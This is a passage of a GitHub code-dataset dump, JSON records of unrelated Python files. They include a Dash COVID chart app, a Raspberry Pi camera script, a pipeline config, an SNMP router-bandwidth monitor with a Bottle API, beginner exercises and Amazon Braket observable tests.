deaths, 'type': 'line', 'name': 'Verstorbene'},\n go.Scatter(x=dates, y=data_country['Active Cases'], name='Infizierte',\n mode='markers', marker_color=COLORS[0]),\n go.Scatter(x=dates, y=data_country['Total Recoveries'], name='Genesene',\n mode='markers', marker_color=COLORS[1]),\n go.Scatter(x=dates, y=data_country['Total Deaths'], name='Verstorbene',\n mode='markers', marker_color=COLORS[2])\n ],\n 'layout': dict(\n xaxis={'title': 'Zeit'},\n yaxis={'title': 'Prozent'},\n margin={'l': 40, 'b': 40, 't': 10, 'r': 10},\n hovermode='closest',\n transition={'duration': 500},\n )\n }\n\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n","repo_name":"titusfranz/Corona_dash_rate_equation","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":15200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20299594727","text":"import picamera\nimport time\nfrom fractions import Fraction\n\ncamera = picamera.PiCamera()\n\n#camera.framerate = Fraction(1, 6)\n#camera.shutter_speed = 6000000\n#camera.exposure_mode = 'off'\n\ncamera.iso = 800\ncamera.ISO = 400\n\n\ncamera.vflip = True\ncamera.hflip = True\ncamera.brightness = 70\n#time.sleep(10)\ncamera.contrast = 50\ncamera.capture('image.jpg')\n","repo_name":"capalmer1013/camera","sub_path":"takePicture.py","file_name":"takePicture.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16317418078","text":"from collections import OrderedDict\n\nVERSION = \"0.11.1\"\n\n# A list of the paths used in the pipeline:\n\n# for testing \nPIPE_PATH = \"/home/ubuntu/server_side/\"\nOUT_FOLDER = \"/gpfs/res_projects/cvcv/webserver/users/\"\n\n# for stable\n#PIPE_PATH = \"/var/genorama/server_side/stable/\"\n#OUT_FOLDER = \"/gpfs/res_projects/cvcv/webserver/users/\"\n\nCOMMAND_PATH = PIPE_PATH 
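In takePicture.py above, camera.iso = 800 is immediately overwritten by camera.ISO = 400; in picamera, ISO is the legacy alias of the iso property, so the capture effectively runs at ISO 400. A cleaned-up sketch that sets the property once and lets the sensor gains settle before capturing:

import time
import picamera

with picamera.PiCamera() as camera:
    camera.vflip = True
    camera.hflip = True
    camera.iso = 400          # one authoritative setting
    camera.brightness = 70
    camera.contrast = 50
    time.sleep(2)             # let auto-gain settle at the new ISO
    camera.capture('image.jpg')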
+ \"commands/\"\nPY_BIOLIB_PATH = \"/gpfs/res_projects/cvcv/webserver/lib/\"\n\nBLAST_DB_FOLDER = \"/gpfs/res_projects/cvcv/webserver/seq_dbs/\"\nHMMER_PROFILE_FOLDER = \"/gpfs/res_projects/cvcv/webserver/seq_dbs/HMM_profiles/\"\n\n# put true to remove \"unecessary\" files for the user\nMINIMAL_OUTPUT=\"TRUE\"\n\n# File system used\nFILE_SYSTEM= \"gpfs\"\n# Docker\n\nDOCKER_CLEANING=\"mycleaning\"\nDOCKER_ASSEMBLY=\"myassembly\"\nDOCKER_IDENTIFY=\"myidentification\"\n\n# Logging:\nLOGFILEBYTES = 500*1024\n# For testing:\nLOGFILE=\"/home/ubuntu/server_side/trufa_pipe.log\"\n\n# For stable\n#LOGFILE=\"/var/genorama/log/trufa_pipe.log\"\n\n\n# For stable:\n\n# IDEA TO HAVE ALL JOB PARA IN A DICT BUT PROBLEM TO ASSIGN READS_FILES_COUNT and ENV\n#JOBS_PARAMS = OrderedDict( [ (\"FASTQC1\", [\"fastqc\", \"cleaning/fastqc.cmd\", None, \"2\", \"03:00:00\", None ,\"STAT/fastqc_report\" ] ) ] )\n\n","repo_name":"laramaktub/TRUFA","sub_path":"lib/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3090276511","text":"import os\nimport sys\nimport subprocess\nimport traceback\nimport time\nimport re\n\nsys.path.append(\"../mie\")\n\nfrom confcenter import XConfCenter\nimport miethread\n\nfrom logtan import logtan_mongodb as logtan\nfrom singleton import AppSingleton, ClsSingleton\n\nfrom bprint import varprt, varfmt\nfrom dotdict import DotDict\nfrom xlogger import klog\nfrom deferdo import DeferDo\nfrom maptan import MapTan\nfrom kstat import kstat, kstatone\nfrom logmon import KLogMon\nfrom snmpoper import SnmpOper as sop, oid as soid\n\nimport pymongo\nclient = pymongo.MongoClient()\ndb = client.snmp\n\n\n\n### ###########################################################\n## Singleton and klog\n#\nAppSingleton(\"/tmp/snmp.pid\", \"Singleton check failed: snmp already exists\")\n\n### ###########################################################\n## Read default configuration\n#\n\nalias = (\n (\"CMDPORT\", \"cmdport\", 9020),\n (\"DEBUG\", \"debug\", True),\n )\n\nconf = XConfCenter(group=\"snmp\", rw_cfg=\"./snmp.cfg\", alias=alias)\nKLogMon(conf)\n\n\n### #####################################################################\n## Globals\n#\n\noid_static = set([\n \"ifIndex\",\n \"ifDescr\",\n \"ifType\",\n \"ifSpeed\",\n \"ifHighSpeed\",\n \"ifPhysAddress\",\n \"ifAdminStatus\",\n \"ifOperStatus\",\n ])\n\noid_runtime = set([\n # \"ifInOctets\",\n # \"ifHCInOctets\",\n # \"ifInUcastPkts\",\n # \"ifInNUcastPkts\",\n # \"ifInDiscards\",\n # \"ifInErrors\",\n # \"ifInUnknownProtos\",\n # \"ifOutOctets\",\n \"ifHCOutOctets\",\n # \"ifOutUcastPkts\",\n # \"ifOutNUcastPkts\",\n # \"ifOutDiscards\",\n # \"ifOutErrors\",\n # \"ifOutQLen\",\n])\n\n\n### #####################################################################\n## Used to fast access port via some critiria\n#\n\n# ipaddr <=> port\ng_port_fr_ipaddr = MapTan(lambda *a: str(a[0]))\n\n# loopback + ifIndex <=> port\ng_port_fr_ifindex = MapTan(lambda *a: \"%s@%s\" % (a[1], a[0]))\n\n# ipaddr <=> setport\ng_setport_fr_ip = MapTan(lambda *a: str(a[0]))\n\n# portUid <=> setport\ng_setport_fr_uid = MapTan(lambda *a: str(a[0]))\n\n# All routes\n# {loopback: DotDict}\ng_routers = {}\n\n\n### #####################################################################\n## Router\n#\nclass Router(DotDict):\n #__metaclass__ = ClsSingleton\n\n def __init__(self, oid_static, oid_runtime, host, comm=\"ctbri\", vern=\"2c\", **kwargs):\n # 
kwargs: other fields of a router\n self.ports = {}\n\n self.oid = {\"static\": oid_static, \"runtime\": oid_runtime}\n\n self.host = host # ip_str\n self.comm = comm # community\n self.vern = vern # version\n\n for k, v in kwargs.items():\n self[k] = v\n\n def load_runtime(self, inf):\n oids = self.oid.get(\"runtime\", [])\n if not oids:\n return\n\n oldrti = inf.get(\"rti\", DotDict())\n tmprti = DotDict()\n\n newinf = DotDict()\n tmprti[\"old\"] = oldrti.get(\"new\", DotDict())\n tmprti[\"new\"] = newinf\n\n newinf[\"time\"] = time.time()\n\n host = inf[\"__loopback__\"]\n comm = inf[\"__snmp_comm__\"]\n vern = inf[\"__snmp_vern__\"]\n\n for name in oids:\n oid = soid.get(name) + \".\" + str(inf.ifIndex)\n try:\n _, _, value = sop.get(host, comm, vern, oid)\n newinf[name] = value\n except:\n traceback.print_exc()\n pass\n\n inf[\"rti\"] = tmprti\n\n def load_static(self):\n '''Collector information according to router's information'''\n\n host, comm, vern = self.host, self.comm, self.vern\n\n lines = sop.walk(host, comm, vern, soid.ipAdEntIfIndex)\n for line in lines:\n port_ipaddr, _, port_index = sop.splitline(\n line, soid.ipAdEntIfIndex)\n if not port_ipaddr:\n continue\n\n # XXX: ifindex number maybe same across different routers\n inf = DotDict()\n self.ports[port_index] = inf\n\n inf[\"__loopback__\"] = host\n inf[\"__snmp_comm__\"] = comm\n inf[\"__snmp_vern__\"] = vern\n inf[\"__ipaddr__\"] = port_ipaddr\n\n oids = self.oid.get(\"static\", [])\n for name in oids:\n oid = soid.get(name) + \".\" + str(port_index)\n try:\n _, _, value = sop.get(host, comm, vern, oid)\n inf[name] = value\n except:\n traceback.print_exc()\n pass\n\n def load(self):\n if not self.ports:\n klog.d(\"load static for: %s\" % self.host)\n self.load_static()\n\n klog.d(\"load runtime for: %s\" % self.host)\n for p in self.ports.values():\n self.load_runtime(p)\n\ndef load_router(equip):\n loopback = equip.get(\"ip_str\")\n if not loopback:\n return\n\n r = Router(oid_static, oid_runtime, loopback, **equip)\n r.load()\n g_routers[loopback] = r\n\n for p in r.ports.values():\n g_port_fr_ipaddr.set(p, p.__ipaddr__)\n g_port_fr_ifindex.set(p, p.__loopback__, p.ifIndex)\n\n\n# Scan all given routers\ndef load_routers(ips):\n global g_routers, g_port_fr_ipaddr, g_port_fr_ifindex\n\n g_routers = {}\n g_port_fr_ipaddr.clr()\n g_port_fr_ifindex.clr()\n\n for loopback in ips:\n d = DotDict()\n d.ip_str = loopback\n d.community = \"ctbri\"\n d.vern = \"2c\"\n d.name = \"Equip@%s\" % loopback\n d.uid = loopback\n d.vendor = \"FIXME\"\n\n load_router(d)\n\n\nclass Collector(miethread.MieThread):\n '''Thread pool to get data from snmp or netconf'''\n __metaclass__ = ClsSingleton\n\n def load_each(self, r):\n klog.d(\"Loading ...:\", r.host)\n r.load()\n\n def update(self):\n '''Scan mango and generate ifindex number and port ipaddr'''\n for r in g_routers.values():\n DeferDo(self.load_each, r)\n\n def __init__(self, name=\"SnmpCollector\"):\n klog.d(\"INTO Collector\")\n miethread.MieThread.__init__(self, name=name)\n self.start()\n\n def act(self):\n '''Fetch and save to db'''\n\n klog.d(\"Collector, acting...\")\n self.update()\n return 10\n\nsnmpCollector = Collector()\n\n\n\n### ###########################################################\n## Bottle: Request and Response\n#\n\nfrom bottle import get, post, put, run, request\nimport json\n\ndef idic():\n try:\n payload = request.body.read() or \"{}\"\n dic = json.JSONDecoder().decode(payload)\n dic = DotDict(**dic)\n return dic\n except:\n traceback.print_exc()\n 
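Router.load_static() and load_runtime() above delegate the actual SNMP traffic to the project's SnmpOper wrapper, which is not part of this file. For reference only, an assumed equivalent of a single sop.get() using the stock pysnmp library:

from pysnmp.hlapi import (SnmpEngine, CommunityData, UdpTransportTarget,
                          ContextData, ObjectType, ObjectIdentity, getCmd)

def snmp_get(host, community, oid):
    # one synchronous SNMP GET; mpModel=1 selects v2c like the code above
    err, status, _, var_binds = next(getCmd(
        SnmpEngine(),
        CommunityData(community, mpModel=1),
        UdpTransportTarget((host, 161)),
        ContextData(),
        ObjectType(ObjectIdentity(oid))))
    if err or status:
        raise RuntimeError(str(err or status.prettyPrint()))
    return var_binds[0][1]

# e.g. ifHCOutOctets for ifIndex 3 (hypothetical router and community):
# snmp_get("11.11.11.11", "ctbri", "1.3.6.1.2.1.31.1.1.1.10.3")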
return DotDict()\n\n\ndef odic(indic):\n odic = DotDict()\n\n odic.response = indic.request\n odic.trans_id = indic.trans_id\n odic.ts = time.strftime(\"%Y%m%d%H%M%S\")\n\n odic.result = DotDict()\n\n odic.err_code = 0\n odic.msg = None\n\n return odic\n\n# request_name <> func\ng_cmdmap = DotDict()\n\ndef cmd_default(calldic=None):\n return \"Bad request '%s'\" % calldic.request\ng_cmdmap.default = cmd_default\n\n@post(\"/link/links\")\ndef docmd_ms_link_links():\n calldic = idic()\n klog.d(varfmt(calldic, \"calldic\"))\n return g_cmdmap.get(calldic.request, \"default\")(calldic)\n\ndef ms_link_set_links(calldic=None):\n '''\n {\n \"args\": {\n \"equips\": [\n {\n \"community\": \"ctbri\",\n \"ip_str\": \"11.11.11.11\",\n \"name\": \"PE11_ALU\",\n \"ports\": [\n {\n \"capacity\": 1000,\n \"if_index\": 2,\n \"if_name\": \"ALU 1/1/1\",\n \"ip_str\": \"10.0.111.11\",\n \"mac\": \"00-00-0A-00-6F-0B\",\n \"type\": 1,\n \"uid\": \"3\"\n },\n {\n \"capacity\": 1000,\n \"if_index\": 3,\n \"if_name\": \"ALU 1/1/2\",\n \"ip_str\": \"10.0.114.11\",\n \"mac\": \"00-00-0A-00-72-0B\",\n \"type\": 0,\n \"uid\": \"13\"\n \"__associated_port__\": 3\n }\n ],\n \"uid\": \"2\",\n \"vendor\": \"ALU\",\n \"x\": 115.0,\n \"y\": 150.0\n },\n ],\n },\n \"request\": \"ms_flow_set_topo\",\n }\n '''\n calldic = calldic or idic()\n\n db.ports.drop()\n\n db.equips.drop()\n equips = calldic[\"args\"].get(\"equips\", [])\n for r in equips:\n ports = r[\"ports\"]\n del r[\"ports\"]\n\n DeferDo(load_router, r)\n\n r[\"_id\"] = r[\"ip_str\"]\n db.equips.replace_one({\"_id\": r[\"_id\"]}, dict(r), True)\n\n for p in ports:\n p[\"_id\"] = \"%s@%s\" % (p[\"ip_str\"], r[\"ip_str\"])\n p[\"router\"] = r[\"ip_str\"]\n db.ports.replace_one({\"_id\": p[\"_id\"]}, dict(p), True)\n\n g_setport_fr_ip.set(p, p.ip_str)\n g_setport_fr_uid.set(p, p.uid)\n\n db.vlinks.drop()\n vlinks = calldic[\"args\"].get(\"vlinks\", [])\n for l in vlinks:\n port = db.ports.find_one({\"uid\": l[\"sport\"]})\n if port:\n port[\"bandwidth\"] = l.get(\"bandwidth\")\n db.ports.replace_one({\"_id\": port[\"_id\"]}, dict(port), True)\n\n respdic = odic(calldic)\n res = json.dumps(respdic)\n\n # TODO: Save new information to db\n snmpCollector.wakeup()\n return res\n\ng_cmdmap.ms_link_set_links = ms_link_set_links\n\nclass SizeConv():\n @classmethod\n def tos(cls, size, unit=None, fp=False, pre=0):\n '''toStr: 1234213412 => 1234213B => 1234KB => 1MB'''\n\n if unit in 'kK':\n size = float(size) / 1024\n elif unit in 'mM':\n size = float(size) / 1024 / 1024\n elif unit in 'gG':\n size = float(size) / 1024 / 1024 / 1024\n elif unit in 'tT':\n size = float(size) / 1024 / 1024 / 1024 / 1024\n elif unit in 'pP':\n size = float(size) / 1024 / 1024 / 1024 / 1024 / 1024\n else:\n size = float(size)\n\n if fp:\n pat = \"{:.%df}\" % pre if pre else \"{:f}\"\n return pat.format(size)\n else:\n return int(size)\n\n\n @classmethod\n def frs(cls, size, fp=False):\n '''frStr: 34712384K => 34712384*1024'''\n\n if not size:\n return 0\n\n size = size.strip()\n\n if size[-1] in 'kK':\n size = float(size[:-1]) * 1024\n elif size[-1] in 'mM':\n size = float(size[:-1]) * 1024 * 1024\n elif size[-1] in 'gG':\n size = float(size[:-1]) * 1024 * 1024 * 1024\n elif size[-1] in 'tT':\n size = float(size[:-1]) * 1024 * 1024 * 1024 * 1024\n elif size[-1] in 'pP':\n size = float(size[:-1]) * 1024 * 1024 * 1024 * 1024 * 1024\n else:\n size = float(size)\n\n return size if fp else int(size)\n\nsc = SizeConv()\n\n\nconf.alias(\"NETUSE_DEBUG\", \"netuse/debug\", True)\ndef netusage(asc=True):\n 
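A quick sanity check of the SizeConv helpers defined above, using the module-level sc instance: frs() parses a human-readable size into bytes, tos() scales a byte count into the requested unit (integer by default, a formatted string with fp=True):

assert sc.frs("1K") == 1024
assert sc.frs("2M") == 2 * 1024 * 1024
assert sc.tos(1048576, "m") == 1
assert sc.tos(1536, "k", fp=True, pre=1) == "1.5"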
out = []\n for r in g_routers.values():\n for p in r.ports.values():\n klog.d(varfmt(p, \"NetUsage\", True))\n try:\n\n d = DotDict()\n\n ipaddr = p.get(\"__ipaddr__\")\n dbport = db.ports.find_one({\"ip_str\": ipaddr})\n if not dbport:\n klog.e(\"Port (%s) not found\" % ipaddr)\n if not conf.NETUSE_DEBUG:\n continue\n else:\n d.port_uid = dbport.get(\"uid\")\n d.if_name = dbport.get(\"if_name\")\n\n d[\"__obj_db__\"] = dbport\n\n\n new = int(p.rti.new.ifHCOutOctets)\n old = int(p.rti.old.ifHCOutOctets)\n\n diff_bytes = new - old\n\n diff_seconds = p.rti.new.time - p.rti.old.time\n bw_in_bytes = int(p.ifHighSpeed) * 1000000 / 8\n\n d.utilization = 100.0 * diff_bytes / diff_seconds / bw_in_bytes\n\n d.__diff_seconds = diff_seconds\n\n b = sc.tos(diff_bytes, \"b\", False, 3)\n k = sc.tos(diff_bytes, \"k\", True, 3)\n m = sc.tos(diff_bytes, \"m\", True, 3)\n g = sc.tos(diff_bytes, \"g\", True, 3)\n text = \"%sB or %sK or %sM or %sG Bytes\" % (b, k, m, g)\n d.__diff_size = text\n\n b = sc.tos(bw_in_bytes, \"b\", False, 3)\n k = sc.tos(bw_in_bytes, \"k\", True, 3)\n m = sc.tos(bw_in_bytes, \"m\", True, 3)\n g = sc.tos(bw_in_bytes, \"g\", True, 3)\n text = \"%sB or %sK or %sM or %sG Bytes\" % (b, k, m, g)\n d.__bandwidth = text\n\n d.ip = p.__ipaddr__\n d.loopback = p.__loopback__\n\n setp = g_setport_fr_ip.get(d.ip)\n if setp:\n d.port_uid = setp.uid\n d.if_name = setp.if_name\n\n out.append(d)\n except:\n continue\n\n mul = 10000000000 if asc else -10000000000\n return sorted(out, lambda x, y: int(mul * (x.utilization - y.utilization)))\n\n\ndef ms_link_get_status(calldic=None):\n '''\n The request:\n {\n \"args\": {},\n \"request\": \"ms_link_get_status\",\n \"trans_id\": 1464244693,\n \"ts\": \"20160526143813\"\n }\n response:\n {\n \"err_code\": 0,\n \"msg\": \"Demo response\",\n \"response\": \"ms_link_get_status\",\n \"result\": {\n \"utilization\": [\n {\n \"port_uid\": \"1000_0\",\n \"utilization\": 107.2\n },\n {\n \"port_uid\": \"1000_2\",\n \"utilization\": 259.8\n }\n ]\n },\n \"trans_id\": 1464244693,\n \"ts\": \"20160526143813\"\n }\n '''\n\n calldic = calldic or idic()\n respdic = odic(calldic)\n\n respdic.result.utilization = netusage(False)\n\n return json.dumps(respdic)\n\ng_cmdmap.ms_link_get_status = ms_link_get_status\n\n\ndef ms_link_set_tunnel(calldic=None):\n '''\n The request:\n {\n \"args\": {\n \"tunnels\": [\n {\n \"bandwidth\": 1000,\n \"from_router_name\": \"\",\n \"from_router_uid\": \"router0\",\n \"name\": \"Microhard_0\",\n \"path\": [\n {},\n {}\n ],\n \"to_router_name\": \"\",\n \"to_router_uid\": \"router4\",\n \"uid\": \"lsp_0\",\n \"user_data\": \"xxx\"\n }\n ]\n },\n \"request\": \"ms_link_set_tunnel\",\n \"trans_id\": 1464244693,\n \"ts\": \"20160526143813\"\n }\n response:\n {\n }\n '''\n\n calldic = calldic or idic()\n respdic = odic(calldic)\n return json.dumps(respdic)\n\ng_cmdmap.ms_link_set_tunnel = ms_link_set_tunnel\n\n\ndef ms_link_get_tunnel_bw(calldic=None):\n '''\n The request:\n {\n \"args\": {},\n \"request\": \"ms_link_get_tunnel_bw\",\n \"trans_id\": 1464244693,\n \"ts\": \"20160526143813\"\n }\n response:\n {\n \"err_code\": 0,\n \"msg\": \"Demo response\",\n \"response\": \"ms_link_get_tunnel_bw\",\n \"result\": {\n \"tunnel_bw\": [\n {\n \"cur_bw\": \"yyy\",\n \"tunnel_uid\": \"xxx\"\n }\n ]\n },\n \"trans_id\": 1464244693,\n \"ts\": \"20160526143813\"\n }\n '''\n calldic = calldic or idic()\n respdic = odic(calldic)\n return json.dumps(respdic)\n\ng_cmdmap.ms_link_get_tunnel_bw = ms_link_get_tunnel_bw\n\n### 
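A worked example of the utilization math in netusage() above: ifHighSpeed is reported in Mbit/s, so a 1000 Mb/s port can move at most 1000 * 1,000,000 / 8 bytes per second, and the counter delta between two polls is normalized against that line rate:

bw_in_bytes = 1000 * 1000000 / 8       # 125,000,000 B/s line rate
diff_bytes = 250 * 1000 * 1000         # ifHCOutOctets delta between polls
diff_seconds = 10.0
utilization = 100.0 * diff_bytes / diff_seconds / bw_in_bytes
print(utilization)                     # 20.0 -> port ran at 20% of line rate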
#####################################################################\n## mcon etc\n#\nfrom roar.roar import CallManager, CmdServer_Socket\nfrom roar import roarcmds\n\ncallman = CallManager(name=\"SNMP\")\ncmdserv = CmdServer_Socket(callman, conf.CMDPORT)\ncmdserv.start()\n\nroarcmds.ExtCommands(callman, conf)\n\n\n@callman.deccmd()\ndef pl(cmdctx, calldic):\n '''Port List\n\n .opt -i byIpAddr\n .opt -l byLoopback\n .opt -as byAdminState\n Query by state, 1 for up, others for down\n .opt -os byOperState\n Query by state, 1 for up, others for down\n .opt --s pat :.*\n Use re to filter out the wanted port.\n\n TODO: should and --include and --exclude option.\n TODO: should and --include and --exclude option.\n TODO: should and --include and --exclude option.\n TODO: should and --include and --exclude option.\n '''\n ports = []\n args = calldic.get_args() or []\n\n pat = calldic.nth_opt(\"s\", 0, \".*\")\n pat = re.compile(pat)\n\n if calldic.get_opt(\"i\"):\n field = \"__ipaddr__\"\n elif calldic.get_opt(\"l\"):\n field = \"__loopback__\"\n elif calldic.get_opt(\"as\"):\n field = \"ifAdminStatus\"\n elif calldic.get_opt(\"os\"):\n field = \"ifOperStatus\"\n else:\n field = \"__ipaddr__\"\n\n for r in g_routers.values():\n for p in r.ports.values():\n if not args or str(p[field]) in args:\n ports.append(p)\n\n res = [p for p in ports if pat.search(str(p))]\n return res\n\n\n@callman.deccmd()\ndef rl(cmdctx, calldic):\n '''Routers List\n\n .opt --s searchpat :.*\n '''\n lis = []\n args = calldic.get_args() or []\n\n pat = calldic.nth_opt(\"s\", 0, \".*\")\n pat = re.compile(pat)\n\n for r in g_routers.values():\n if not args or r.host in args:\n lis.append(r)\n\n res = [r for r in lis if pat.search(str(r))]\n return res\n\n\n@callman.deccmd()\ndef rload(cmdctx, calldic):\n '''Routers load'''\n for r in g_routers.values():\n r.load()\n return \"OK\"\n\n\n@callman.deccmd()\ndef util(cmdctx, calldic):\n '''Bandwidth usage\n\n Show Bandwidth usage.\n a. aaaaaaaaaaaa\n b. aaaaaaaaaaaa\n\n .opt --s searchPat :.*\n .arg count\n\n\n\n\n How many count should be returned.\n How many count should be returned.\n\n\n How many count should be returned.\n How many count should be returned.\n\n\n\n .arg fake\n Show this part\n\n .arg fake2\n\n\n\n\n '''\n cnt = calldic.nth_arg(0) or 1000000\n cnt = int(cnt)\n\n pat = calldic.nth_opt(\"s\", 0, \".*\")\n pat = re.compile(pat)\n\n utils = netusage(False)\n\n res = [i for i in utils if pat.search(str(i))]\n return res[:cnt]\n\n@callman.deccmd()\ndef iplist(cmdctx, calldic):\n '''Show all ip address return by scan operation'''\n ips = []\n for r in g_routers.values():\n ips.extend([p[\"__ipaddr__\"] for p in r.ports.values()])\n return sorted(ips, lambda x,y: int(x.split(\".\")[0]) - int(y.split(\".\")[0]))\n\n\nif __name__ == \"__main__\":\n # map(lambda x: klog.d(\"#\" * x), range(10, 100, 10))\n ips = sys.argv[1:]\n if ips:\n load_routers(ips)\n topo_scan(g_routers)\n else:\n ips = []\n for dic in db.equips.find({}, {\"_id\": 0, \"ip_str\": 1, \"community\": 1}):\n ips.append(dic.get(\"ip_str\"))\n load_routers(ips)\n\n run(server='paste', host='0.0.0.0', port=10000, debug=True)\n\n","repo_name":"open-o/sdno-monitoring","sub_path":"sdno-link-monitor/snmp/snmp.py","file_name":"snmp.py","file_ext":"py","file_size_in_byte":19072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33519395201","text":"def bintang(n):\n i = 0\n while(iDone!
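The bintang record above is cut off mid-while in this dump and fused with the tail of the next record. A plausible reconstruction of the classic nested-loop star triangle (an assumption, not the original file):

def bintang(n):
    i = 0
    while i < n:
        j = 0
        while j <= i:
            print("*", end="")
            j += 1
        print()
        i += 1

bintang(3)
# *
# **
# ***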

    \"","repo_name":"alifattahi/mysql-materialized","sub_path":"seeder.py","file_name":"seeder.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"40490207304","text":"#PENJUMLAHAN LIST \n\ndata_a = []\ndata_b = []\njumlah = []\npanjang = 0\n\nukuran = int(input(\"Masukkan ukuran list ke- 1 = \"))\nfor i in range(ukuran):\n print(\"Masukkan data yang ke-\",i,\": \",end='')\n list1 = int(input())\n data_a.append(list1)\n \nukuran1 = int(input(\"Masukkan ukuran list ke- 2 = \"))\nfor i in range(ukuran1):\n print(\"Masukkan data yang ke-\",i,\": \",end='')\n list2 = int(input())\n data_b.append(list2)\n\nif len(data_a) > len(data_b):\n panjang= len(data_a)\nelse:\n panjang = len(data_b)\n\nfor i in range(panjang):\n if len(data_a) < len(data_b):\n data_b.append(0)\n elif len(data_b) > len(data_a):\n data_a.append(0)\n total = data_a[i]+ data_b[i]\n jumlah.append(total)\n\nprint('List Pertama=',data_a[0:ukuran])\nprint('List Kedua=',data_b[0:ukuran1])\nprint('Hasil Penjumlahan=',jumlah)\n","repo_name":"dewialqurani/ALPRO_SEMESTER1","sub_path":"LATIHAN MODUL BU INDAH/modul 5 penjumlahan list.py","file_name":"modul 5 penjumlahan list.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33403138776","text":"def partition(l, r, arr):\r\n\r\n pivot, ptr = arr[r], l\r\n for i in range(l, r):\r\n if arr[i] <= pivot:\r\n\r\n arr[i], arr[ptr] = arr[ptr], arr[i]\r\n ptr += 1\r\n print(arr)\r\n\r\n arr[ptr], arr[r] = arr[r], arr[ptr]\r\n\r\n return ptr\r\n\r\n\r\ndef quicksort(l, r, arr):\r\n if len(arr) == 1:\r\n return arr\r\n\r\n if l < r:\r\n pivot = partition(l, r, arr)\r\n quicksort(l, pivot - 1, arr)\r\n quicksort(pivot + 1, r, arr)\r\n return arr\r\n\r\n\r\nexample = [4, 5, 1, 2, 3]\r\nresult = [1, 2, 3, 4, 5]\r\nprint(quicksort(0, len(example) - 1, example))","repo_name":"Sarveshk76/Interview-Questions","sub_path":"Quick sort.py","file_name":"Quick sort.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23644808784","text":"import math\n\nimport numpy as np\nimport numpy.testing as npt\nimport pytest\n\nfrom braket.circuits import Gate, Observable\nfrom braket.circuits.observables import observable_from_ir\nfrom braket.circuits.quantum_operator_helpers import get_pauli_eigenvalues\nfrom braket.circuits.serialization import (\n IRType,\n OpenQASMSerializationProperties,\n QubitReferenceType,\n)\n\ntestdata = [\n (Observable.I(), Gate.I(), [\"i\"], (), np.array([1, 1])),\n (Observable.X(), Gate.X(), [\"x\"], tuple([Gate.H()]), get_pauli_eigenvalues(1)),\n (\n Observable.Y(),\n Gate.Y(),\n [\"y\"],\n tuple([Gate.Z(), Gate.S(), Gate.H()]),\n get_pauli_eigenvalues(1),\n ),\n (Observable.Z(), Gate.Z(), [\"z\"], (), get_pauli_eigenvalues(1)),\n (Observable.H(), Gate.H(), [\"h\"], tuple([Gate.Ry(-math.pi / 4)]), get_pauli_eigenvalues(1)),\n]\n\ninvalid_hermitian_matrices = [\n (np.array([[1]])),\n (np.array([1])),\n (np.array([0, 1, 2])),\n (np.array([[0, 1], [1, 2], [3, 4]])),\n (np.array([[0, 1, 2], [2, 3]], dtype=object)),\n (np.array([[0, 1, 2], [3, 4, 5], [6, 7, 8]])),\n (Gate.T().to_matrix()),\n]\n\n\n@pytest.mark.parametrize(\n \"testobject,gateobject,expected_ir,basis_rotation_gates,eigenvalues\", testdata\n)\ndef test_to_ir(testobject, gateobject, expected_ir, basis_rotation_gates, 
eigenvalues):\n expected = expected_ir\n actual = testobject.to_ir()\n assert actual == expected\n\n\n@pytest.mark.parametrize(\n \"observable, serialization_properties, target, expected_ir\",\n [\n (\n Observable.I(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.VIRTUAL),\n [3],\n \"i(q[3])\",\n ),\n (\n Observable.I(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [3],\n \"i($3)\",\n ),\n (\n Observable.I(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.VIRTUAL),\n None,\n \"i all\",\n ),\n (\n Observable.X(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.VIRTUAL),\n [3],\n \"x(q[3])\",\n ),\n (\n Observable.X(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [3],\n \"x($3)\",\n ),\n (\n Observable.X(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.VIRTUAL),\n None,\n \"x all\",\n ),\n (\n Observable.Y(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.VIRTUAL),\n [3],\n \"y(q[3])\",\n ),\n (\n Observable.Y(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [3],\n \"y($3)\",\n ),\n (\n Observable.Y(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.VIRTUAL),\n None,\n \"y all\",\n ),\n (\n Observable.Z(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.VIRTUAL),\n [3],\n \"z(q[3])\",\n ),\n (\n Observable.Z(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [3],\n \"z($3)\",\n ),\n (\n Observable.Z(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.VIRTUAL),\n None,\n \"z all\",\n ),\n (\n Observable.H(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.VIRTUAL),\n [3],\n \"h(q[3])\",\n ),\n (\n Observable.H(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [3],\n \"h($3)\",\n ),\n (\n Observable.H(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.VIRTUAL),\n None,\n \"h all\",\n ),\n (\n Observable.Hermitian(np.eye(4)),\n 